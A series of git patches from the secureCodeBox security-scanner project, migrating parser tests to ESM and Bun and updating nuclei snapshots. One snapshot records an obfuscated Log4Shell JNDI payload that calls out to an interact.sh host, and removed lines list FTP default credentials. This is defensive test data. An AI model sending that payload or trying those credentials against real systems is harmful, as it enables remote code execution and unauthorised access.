@@ -333,7 +333,7 @@ test("should properly parse empty json file", async () => { __dirname + "/__testFiles__/empty-localhost.json", { encoding: "utf8", - } + }, ); const findings = await parse(jsonContent); await expect(validateParser(findings)).resolves.toBeUndefined(); From 8d7e1efa6c87153cb6680d945a772bda284b1c2a Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:47:50 +0200 Subject: [PATCH 018/137] Ignore prettier mega reformat from git blames Signed-off-by: Jannik Hollenbach --- .git-blame-ignore-revs | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/.git-blame-ignore-revs b/.git-blame-ignore-revs index 110f7436f2..e17fb623ad 100644 --- a/.git-blame-ignore-revs +++ b/.git-blame-ignore-revs @@ -13,4 +13,6 @@ # Applied megalinter automatic fixes 992174c1fb24a0808ee2894dfff22e568af2b589 # prettier reformatting of the notification hook -3f033b5c73a087f474f1f22c5091dc5b096bfadd \ No newline at end of file +3f033b5c73a087f474f1f22c5091dc5b096bfadd +# prettier reformatting of most scanner / parser files +5f61e5c9f128e405c5335ab08cd4cd4ad43675d9 From 9e70589d057907e4a8e9db6b18bd80ca77854f6d Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 20:50:04 +0200 Subject: [PATCH 019/137] Migrate cmsseek to esm Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 2 +- .../cmseek/integration-tests/cmseek.test.js | 19 +++++++++++++------ scanners/cmseek/parser/parser.js | 4 +--- scanners/cmseek/parser/parser.test.js | 19 +++++++------------ 4 files changed, 22 insertions(+), 22 deletions(-) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 89dfc90595..112302b10e 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -419,7 +419,7 @@ jobs: matrix: unit: - amass - # - cmseek + - cmseek # - ffuf # - git-repo-scanner # - gitleaks diff --git a/scanners/cmseek/integration-tests/cmseek.test.js b/scanners/cmseek/integration-tests/cmseek.test.js index 988b0e2c85..f3bf6dd7be 100644 --- a/scanners/cmseek/integration-tests/cmseek.test.js +++ b/scanners/cmseek/integration-tests/cmseek.test.js @@ -2,9 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const { scan } = require("../../../tests/integration/helpers.js"); - -jest.retryTimes(3); +import { scan } from "../../../tests/integration/helpers.js"; test( "cmseek scans old-joomla for vulnerabilities without redirection", @@ -30,7 +28,10 @@ test( } `); }, - 3 * 60 * 1000, + { + timeout: 3 * 60 * 1000, + retries: 3, + }, ); test( @@ -55,7 +56,10 @@ test( } `); }, - 3 * 60 * 1000, + { + timeout: 3 * 60 * 1000, + retries: 3, + }, ); test( @@ -65,5 +69,8 @@ test( scan("cmseek-invalidArg", "cmseek", ["--invalidArg", "example.com"], 90), ).rejects.toThrow("HTTP request failed"); }, - 3 * 60 * 1000, + { + timeout: 3 * 60 * 1000, + retries: 3, + }, ); diff --git a/scanners/cmseek/parser/parser.js b/scanners/cmseek/parser/parser.js index 17b480f632..efc01ae239 100644 --- a/scanners/cmseek/parser/parser.js +++ b/scanners/cmseek/parser/parser.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -async function parse(findings) { +export async function parse(findings) { let results = []; // Making sure the CMS is Joomla if (findings.cms_id != "joom") { @@ -109,5 +109,3 @@ function fetchCVE(references) { } return null; } - -module.exports.parse = parse; diff --git a/scanners/cmseek/parser/parser.test.js b/scanners/cmseek/parser/parser.test.js index 72ce410236..0fdfb29448 100644 --- a/scanners/cmseek/parser/parser.test.js +++ b/scanners/cmseek/parser/parser.test.js @@ -2,20 +2,15 @@ // // SPDX-License-Identifier: Apache-2.0 -const fs = require("fs"); -const util = require("util"); +import { readFile } from "fs/promises"; -const readFile = util.promisify(fs.readFile); +import { parse } from "./parser"; -const { parse } = require("./parser"); - -const { - validateParser, -} = require("@securecodebox/parser-sdk-nodejs/parser-utils"); +import { validateParser } from "@securecodebox/parser-sdk-nodejs/parser-utils"; test("parser parses result of Joomla scan with core vulnerabilities successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/joomla_with_core_vulns.json", + import.meta.dirname + "/__testFiles__/joomla_with_core_vulns.json", { encoding: "utf8", }, @@ -28,7 +23,7 @@ test("parser parses result of Joomla scan with core vulnerabilities successfully test("parser parses result of Joomla scan without core vulnerabilities successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/joomla_without_core_vulns.json", + import.meta.dirname + "/__testFiles__/joomla_without_core_vulns.json", { encoding: "utf8", }, @@ -41,7 +36,7 @@ test("parser parses result of Joomla scan without core vulnerabilities successfu test("parser parses result of non-Joomla scan successfully", async () => { const fileContent = await readFile( - __dirname + "/__testFiles__/not_joomla.json", + import.meta.dirname + "/__testFiles__/not_joomla.json", { encoding: "utf8", }, @@ -54,7 +49,7 @@ test("parser parses result of non-Joomla scan successfully", async () => { test("should properly parse empty cmseek json file", async () => { const jsonContent = await readFile( - __dirname + "/__testFiles__/test-empty-report.json", + import.meta.dirname + "/__testFiles__/test-empty-report.json", { encoding: "utf8", }, From 5376f4b8d7832a726da80cf19bf53609388a3889 Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Mon, 16 Jun 2025 21:38:09 +0200 Subject: [PATCH 020/137] Install integration test helper dependencies Signed-off-by: Jannik Hollenbach --- .github/workflows/ci.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/.github/workflows/ci.yaml b/.github/workflows/ci.yaml index 112302b10e..b8655264ed 100644 --- a/.github/workflows/ci.yaml +++ b/.github/workflows/ci.yaml @@ -482,6 +482,10 @@ jobs: working-directory: ./scanners/ run: bun install + - name: Install integration test helper dependencies + working-directory: ./tests/integration/ + run: bun install + - name: Install Dependencies working-directory: ./scanners/${{ matrix.unit }}/parser/ #install dependencies for the parser if the directory has a package.json From 00061684e1c4ae44689b80326fb2a7f1fda5ebec Mon Sep 17 00:00:00 2001 From: Jannik Hollenbach Date: Tue, 17 Jun 2025 08:54:10 +0200 Subject: [PATCH 021/137] Update nuclei snapshots Signed-off-by: Jannik Hollenbach --- .../parser/__snapshots__/parser.test.js.snap | 527 +++++++++--------- .../parser/__testFiles__/ftp-test.jsonl | 2 - .../__testFiles__/ftp-test.jsonl.license | 3 - scanners/nuclei/parser/parser.test.js | 13 - 4 files changed, 276 insertions(+), 269 deletions(-) delete mode 100644 scanners/nuclei/parser/__testFiles__/ftp-test.jsonl delete mode 100644 scanners/nuclei/parser/__testFiles__/ftp-test.jsonl.license diff --git a/scanners/nuclei/parser/__snapshots__/parser.test.js.snap b/scanners/nuclei/parser/__snapshots__/parser.test.js.snap index fa2b763c4f..f20ba608c3 100644 --- a/scanners/nuclei/parser/__snapshots__/parser.test.js.snap +++ b/scanners/nuclei/parser/__snapshots__/parser.test.js.snap @@ -1,187 +1,7 @@ -// Jest Snapshot v1, https://goo.gl/fbAQLP +// Bun Snapshot v1, https://goo.gl/fbAQLP exports[`parses empty result correctly 1`] = `[]`; -exports[`parses ftp result correctly 1`] = ` -Array [ - Object { - "attributes": Object { - "author": null, - "extracted_results": null, - "ip": "127.0.0.1", - "matched": "www.example.com:21", - "matcher_name": null, - "metadata": Object { - "password": "default", - "username": "anonymous", - }, - "reference": null, - "tags": null, - "timestamp": "2021-08-20T22:00:48.088618+02:00", - "type": "network", - }, - "category": "ftp-default-credentials", - "description": "The name of the nuclei rule which triggered the finding: ftp-default-credentials", - "location": "www.example.com", - "name": "FTP Service with default credentials", - "severity": "HIGH", - }, - Object { - "attributes": Object { - "author": null, - "extracted_results": null, - "ip": "127.0.0.1", - "matched": "www.example.com:21", - "matcher_name": null, - "metadata": Object { - "password": "stingray", - "username": "anonymous", - }, - "reference": null, - "tags": null, - "timestamp": "2021-08-20T22:00:48.161349+02:00", - "type": "network", - }, - "category": "ftp-default-credentials", - "description": "The name of the nuclei rule which triggered the finding: ftp-default-credentials", - "location": "www.example.com", - "name": "FTP Service with default credentials", - "severity": "HIGH", - }, -] -`; - -exports[`parses log4shell result correctly 1`] = ` -[ - { - "attributes": { - "author": [ - "melbadry9", - "dhiyaneshdk", - "daffainfo", - "j12934", - ], - "curl_command": "curl -X 'GET' -d '' -H 'Host: 10.1.6.107:8080' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' -H 'X-Api-Version: \${\${::-j}\${::-n}\${::-d}\${::-i}:\${::-l}\${::-d}\${::-a}\${::-p}://\${hostName}.c70v8s2ukqds73d3ve90c8y9eheyyyyyc.interact.sh}' 'http://10.1.6.107:8080/'", - "extracted_results": [ - "vuln-log4j-vulnerable-log4j-74bbf59745-h2kqj", - ], - "hostname": "10.1.6.107", - "ip_addresses": [ - "10.1.6.107", - ], - "matched_at": "http://10.1.6.107:8080/", - "matched_line": null, - "matcher_name": null, - "matcher_status": true, - "metadata": null, - "path": null, - "reference": [ - "https://github.com/advisories/ghsa-jfh8-c2jp-5v3q", - "https://www.lunasec.io/docs/blog/log4j-zero-day/", - "https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a", - ], - "request": null, - "response": null, - "tags": [ - "cve", - "cve2021", - "rce", - "oast", - "log4j", - ], - "template": undefined, - "template_id": "CVE-2021-44228", - "template_url": undefined, - "timestamp": "2021-12-21T15:36:21.9627479Z", - "type": "http", - }, - "category": "CVE-2021-44228", - "description": "Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.", - "identified_at": "2021-12-21T15:36:21.962Z", - "location": "http://10.1.6.107:8080", - "name": "Remote code injection in Log4j", - "references": [ - { - "type": "URL", - "value": "https://github.com/advisories/ghsa-jfh8-c2jp-5v3q", - }, - { - "type": "URL", - "value": "https://www.lunasec.io/docs/blog/log4j-zero-day/", - }, - { - "type": "URL", - "value": "https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a", - }, - ], - "severity": "HIGH", - }, -] -`; - -exports[`parses results with requests & responses correctly 1`] = ` -[ - { - "attributes": { - "author": [ - "pdteam", - ], - "curl_command": "curl -X 'OPTIONS' -d '' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36' 'https://example.com'", - "extracted_results": [ - "OPTIONS, GET, HEAD, POST", - ], - "hostname": "example.com", - "ip_addresses": [ - "93.184.216.34", - ], - "matched_at": "https://example.com", - "matched_line": null, - "matcher_name": null, - "matcher_status": true, - "metadata": null, - "path": null, - "reference": null, - "request": "OPTIONS / HTTP/1.1 -Host: example.com -User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 -Connection: close -Accept: */* -Accept-Language: en -Accept-Encoding: gzip - -", - "response": "HTTP/1.1 200 OK -Connection: close -Allow: OPTIONS, GET, HEAD, POST -Cache-Control: max-age=604800 -Content-Type: text/html; charset=UTF-8 -Date: Fri, 09 Sep 2022 19:56:16 GMT -Expires: Fri, 16 Sep 2022 19:56:16 GMT -Server: EOS (vny/0454) -Content-Length: 0 - -", - "tags": [ - "misc", - "generic", - ], - "template": "miscellaneous/options-method.yaml", - "template_id": "options-method", - "template_url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/miscellaneous/options-method.yaml", - "timestamp": "2022-09-09T21:56:16.141265+02:00", - "type": "http", - }, - "category": "options-method", - "description": "The name of the nuclei rule which triggered the finding: options-method", - "identified_at": "2022-09-09T19:56:16.141Z", - "location": "https://example.com", - "name": "Allowed Options Method", - "references": null, - "severity": "INFORMATIONAL", - }, -] -`; - exports[`parses secureCodeBox.io result correctly 1`] = ` [ { @@ -354,8 +174,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.644Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -399,8 +221,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.644Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -444,8 +268,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.644Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -489,8 +315,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.644Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -534,8 +362,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.645Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -579,8 +409,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.645Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -624,8 +456,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.655Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -669,8 +503,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.659Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -714,8 +550,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.659Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -759,8 +597,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.659Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -804,8 +644,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.659Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -849,8 +691,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.660Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -894,8 +738,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.660Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -939,8 +785,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.660Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -984,8 +832,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.660Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -1029,8 +879,10 @@ exports[`parses secureCodeBox.io result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:27:13.660Z", "location": "https://www.securecodebox.io", "name": "HTTP Missing Security Headers", @@ -1216,8 +1068,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.271Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1261,8 +1115,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.272Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1306,8 +1162,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.272Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1351,8 +1209,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.272Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1396,8 +1256,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.272Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1441,8 +1303,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.272Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1486,8 +1350,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.292Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1531,8 +1397,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1576,8 +1444,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1621,8 +1491,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1666,8 +1538,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1711,8 +1585,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1756,8 +1632,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1801,8 +1679,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1846,8 +1726,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1891,8 +1773,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.293Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -1936,8 +1820,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "http", }, "category": "http-missing-security-headers", - "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary. -", + "description": +"This template searches for missing HTTP security headers. The impact of these missing headers can vary. +" +, "identified_at": "2022-09-09T19:18:55.294Z", "location": "https://example.com", "name": "HTTP Missing Security Headers", @@ -2067,8 +1953,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "ssl", }, "category": "deprecated-tls", - "description": "Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. -", + "description": +"Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. +" +, "identified_at": "2022-09-09T19:20:23.432Z", "location": "https://example.com", "name": "Deprecated TLS Detection (TLS 1.1 or SSLv3)", @@ -2117,8 +2005,10 @@ exports[`parses the example.com result correctly 1`] = ` "type": "ssl", }, "category": "deprecated-tls", - "description": "Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. -", + "description": +"Both TLS 1.1 and SSLv3 are deprecated in favor of stronger encryption. +" +, "identified_at": "2022-09-09T19:20:23.731Z", "location": "https://example.com", "name": "Deprecated TLS Detection (TLS 1.1 or SSLv3)", @@ -2435,3 +2325,138 @@ exports[`parses the example.com result correctly 1`] = ` }, ] `; + +exports[`parses log4shell result correctly 1`] = ` +[ + { + "attributes": { + "author": [ + "melbadry9", + "dhiyaneshdk", + "daffainfo", + "j12934", + ], + "curl_command": "curl -X 'GET' -d '' -H 'Host: 10.1.6.107:8080' -H 'User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' -H 'X-Api-Version: \${\${::-j}\${::-n}\${::-d}\${::-i}:\${::-l}\${::-d}\${::-a}\${::-p}://\${hostName}.c70v8s2ukqds73d3ve90c8y9eheyyyyyc.interact.sh}' 'http://10.1.6.107:8080/'", + "extracted_results": [ + "vuln-log4j-vulnerable-log4j-74bbf59745-h2kqj", + ], + "hostname": "10.1.6.107", + "ip_addresses": [ + "10.1.6.107", + ], + "matched_at": "http://10.1.6.107:8080/", + "matched_line": null, + "matcher_name": null, + "matcher_status": true, + "metadata": null, + "path": null, + "reference": [ + "https://github.com/advisories/ghsa-jfh8-c2jp-5v3q", + "https://www.lunasec.io/docs/blog/log4j-zero-day/", + "https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a", + ], + "request": null, + "response": null, + "tags": [ + "cve", + "cve2021", + "rce", + "oast", + "log4j", + ], + "template": undefined, + "template_id": "CVE-2021-44228", + "template_url": undefined, + "timestamp": "2021-12-21T15:36:21.9627479Z", + "type": "http", + }, + "category": "CVE-2021-44228", + "description": "Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.", + "identified_at": "2021-12-21T15:36:21.962Z", + "location": "http://10.1.6.107:8080", + "name": "Remote code injection in Log4j", + "references": [ + { + "type": "URL", + "value": "https://github.com/advisories/ghsa-jfh8-c2jp-5v3q", + }, + { + "type": "URL", + "value": "https://www.lunasec.io/docs/blog/log4j-zero-day/", + }, + { + "type": "URL", + "value": "https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a", + }, + ], + "severity": "HIGH", + }, +] +`; + +exports[`parses results with requests & responses correctly 1`] = ` +[ + { + "attributes": { + "author": [ + "pdteam", + ], + "curl_command": "curl -X 'OPTIONS' -d '' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36' 'https://example.com'", + "extracted_results": [ + "OPTIONS, GET, HEAD, POST", + ], + "hostname": "example.com", + "ip_addresses": [ + "93.184.216.34", + ], + "matched_at": "https://example.com", + "matched_line": null, + "matcher_name": null, + "matcher_status": true, + "metadata": null, + "path": null, + "reference": null, + "request": +"OPTIONS / HTTP/1.1 +Host: example.com +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 +Connection: close +Accept: */* +Accept-Language: en +Accept-Encoding: gzip + +" +, + "response": +"HTTP/1.1 200 OK +Connection: close +Allow: OPTIONS, GET, HEAD, POST +Cache-Control: max-age=604800 +Content-Type: text/html; charset=UTF-8 +Date: Fri, 09 Sep 2022 19:56:16 GMT +Expires: Fri, 16 Sep 2022 19:56:16 GMT +Server: EOS (vny/0454) +Content-Length: 0 + +" +, + "tags": [ + "misc", + "generic", + ], + "template": "miscellaneous/options-method.yaml", + "template_id": "options-method", + "template_url": "https://github.com/projectdiscovery/nuclei-templates/blob/master/miscellaneous/options-method.yaml", + "timestamp": "2022-09-09T21:56:16.141265+02:00", + "type": "http", + }, + "category": "options-method", + "description": "The name of the nuclei rule which triggered the finding: options-method", + "identified_at": "2022-09-09T19:56:16.141Z", + "location": "https://example.com", + "name": "Allowed Options Method", + "references": null, + "severity": "INFORMATIONAL", + }, +] +`; diff --git a/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl b/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl deleted file mode 100644 index cd1491b957..0000000000 --- a/scanners/nuclei/parser/__testFiles__/ftp-test.jsonl +++ /dev/null @@ -1,2 +0,0 @@ -{"templateID":"ftp-default-credentials","info":{"severity":"critical","tags":"network,ftp,default-login","name":"FTP Service with default 